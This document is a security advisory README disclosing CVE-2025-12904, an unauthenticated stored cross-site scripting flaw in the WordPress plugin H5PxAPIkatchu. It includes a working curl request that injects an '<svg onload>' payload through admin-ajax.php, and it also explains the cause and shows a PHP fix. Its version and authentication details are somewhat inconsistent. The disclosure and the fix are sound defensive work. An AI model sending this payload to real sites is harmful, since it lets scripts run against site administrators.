CVE-2025-12904 PoC — WordPress plugin SNORDIANs H5PxAPIkatchu Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
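Title: WordPress plugin SNORDIANs H5PxAPIkatchu Cross-Site Scripting Vulnerability (CVE-2025-12904)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers based on PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin SNORDIANs H5PxAPIkatchu 0.4.17 and earlier contains a cross-site scripting vulnerability, which stems from insufficient input sanitization and output escaping and may lead to stored cross-site scripting attacks.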
Description
Disclosure for CVE-2025-12904
Readme
# SNORDIAN's-H5PxAPIkatchu-CVE-Report
Disclosure for CVE-2025-12904

# CVE-2025-12904 - Vulnerability in SNORDIAN's H5PxAPIkatchu

This repository discloses a vulnerability discovered in [SNORDIAN's H5PxAPIkatchu <= 0.4.16](https://wordpress.org/plugins/h5pxapikatchu/), a WordPress plugin developed by otacke.

## 🛠 Affected Version

- **Product**: SNORDIAN's H5PxAPIkatchu
- **Version**: v0.4.16
- **URL**: https://wordpress.org/plugins/h5pxapikatchu/

---

## 🔒 Assigned CVE
| CVE ID | Type | Component | Impact |
|--------|------|-----------|--------|
| CVE-2025-12904 | Unauthenticated Stored Cross-Site Scripting via insert_data | class-table-view.php | Authenticated attacker can execute JS |

---

## 🧾 Detailed Description

### CVE-2025-12904 — Unauthenticated Stored Cross-Site Scripting via insert_data

 - **Affected Component**: h5pxapikatchu admin page
 - **Attack Vector**: Unauthenticated via POST request
 - **Trigger**: An attacker can inject malicious scripts into the admin interface by exploiting the insert_data action to store arbitrary scripts.

```
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'
```
※ If the `id` within `object` does not exist, the request will fail.

 - **Impact**: Stored scripts may be executed, posing a risk of serious harm such as account hijacking.

## ❓Reason for the vulnerability

The `insert_data()` function did not perform any permission checks, so malicious input could be saved without authentication. In addition, the stored entries were displayed unescaped in the administration interface. Both issues have a direct fix:
 - Adding a `current_user_can` check to `insert_data()` prevents unauthorised execution.
 - Using `esc_html($value)` rather than `echo $value` when rendering stored values prevents XSS execution.
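
The two fixes listed above, shown together as an added example that is not the plugin's own code. The `h5px_example_*` function names, the action name, the table name, and the chosen capability are all assumptions made for illustration.

```php
<?php
// Added example: hypothetical names (h5px_example_*), not the plugin's code.
// Assumption: statements should only be accepted from logged-in users.
const H5PX_EXAMPLE_CAP = 'read'; // assumed capability; choose per site policy

// Register only the authenticated hook. A wp_ajax_nopriv_* hook would let
// logged-out visitors reach the handler.
add_action( 'wp_ajax_h5px_example_insert', 'h5px_example_insert' );

function h5px_example_insert() {
    // 1. Permission check before any input is parsed or stored.
    if ( ! current_user_can( H5PX_EXAMPLE_CAP ) ) {
        wp_send_json_error( 'forbidden', 403 ); // sends JSON and exits
    }

    $raw  = isset( $_POST['xapi'] ) ? wp_unslash( $_POST['xapi'] ) : '';
    $xapi = is_string( $raw ) ? json_decode( $raw, true ) : null;
    $id   = is_array( $xapi ) ? ( $xapi['object']['id'] ?? null ) : null;
    if ( ! is_string( $id ) ) {
        wp_send_json_error( 'bad statement', 400 );
    }
    $response = $xapi['result']['response'] ?? '';

    global $wpdb;
    // Store the value as plain data; escaping is applied at output time,
    // for the context it is printed into.
    $wpdb->insert(
        $wpdb->prefix . 'h5px_example', // hypothetical table
        array(
            'object_id' => esc_url_raw( $id ),
            'response'  => is_scalar( $response ) ? (string) $response : '',
        ),
        array( '%s', '%s' )
    );
    wp_send_json_success();
}

// 2. Output escaping in the admin table view.
function h5px_example_render_row( array $row ) {
    $cells = '';
    foreach ( $row as $value ) {
        // The unescaped form, '<td>' . $value . '</td>', lets stored markup
        // run in the administrator's browser.
        $cells .= '<td>' . esc_html( (string) $value ) . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}
```

Rows stored before the fix still contain whatever was submitted, so the output escaping in step 2 is needed even after the permission check is in place.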

 

 
## 🔍 Discoverer

**Name**: MooseLove  
**Role**: Independent security researcher / bug hunter  
**Contact**: Available upon request  

---

## 📚 References

- Product: https://wordpress.org/plugins/h5pxapikatchu/

---

## ⚠️ License

This advisory is provided for public security awareness. Free to share with attribution.